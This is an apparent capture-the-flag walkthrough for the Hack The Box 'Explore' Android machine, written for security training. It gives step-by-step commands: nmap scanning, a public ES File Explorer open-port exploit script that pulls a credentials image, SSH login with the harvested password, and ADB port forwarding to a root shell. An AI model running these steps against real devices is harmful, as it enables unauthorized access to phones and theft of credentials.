Explore Hackthebox Walkthrough


“Explore” is a Capture the Flag challenge that we’ll be solving today. (HTB) Hack the Box is where you can get your hands on one, this box is based on ADB (Android Debug Bridge). So, let’s get started and learn how to break it down successfully. So, let’s get started and learn how to split it down effectively.

Pentesting Methodology


  • Port Scanning & Enumeration
  • Exploitation
  • Privilege Escalation

Port Scanning & Enumeration


Starting the full port scan

nmap -p- -sV

-p-: detect all ports

-sV: detect service version

According to the nmap output, we get

  • on port 2222 SSH server running
  • on port 59777 HTTP service running
  • on port 5555 a TCP service running

While searching for port 59777 on the internet, we come up with the following GitHub as the first result


Copy the path from the GitHub URL to our Kali System so that we may get the file.

git clone
cd ESFileExplorerOpenPortVuln
python list

There is a python exploit script that we can use to see if anything can be found. We get the creds.jpg file, the name “creds” gives us an indication that it may include the credentials, which are the login id and password that may be used for SSH later on.

python --cmd listPics --ip
python -g /storage/emulated/0/DCIM/creds.jpg --ip

Ahh, the file seemed to contain a username and password.

Username: Kristi
Password: [email protected]!

Having remembered that an SSH port was open on 2222, I attempted to SSH into the machine using these credentials.

ssh [email protected] -p 2222

Privilege Escalation

An ADB service is running on port 5555, and we have SSH access. Allow ADB to run on the device by configuring SSH port forwarding.

ssh [email protected] -p 2222 -L 5555:localhost:5555

After configuring port forwarding, I can run ADB commands, obtain a shell, elevate the shell to root, and search for the root.txt file.

Note: If you don’t have an ADB installed in your Kali Machine, use the command:

apt install adb

In order to connect with adb use the following command:

adb connect

In order to get the shell, execute the command given below, as we have already established a connection.

adb -s shell
cd data
cat root.txt

Author: Sakshi Gurao is a Researcher and Technical Writer at Hacking Articles, Red Teamer, Penetration Tester. Contact Linkedin


Spread the love

Related Post

Leave a Reply

Your email address will not be published. Required fields are marked *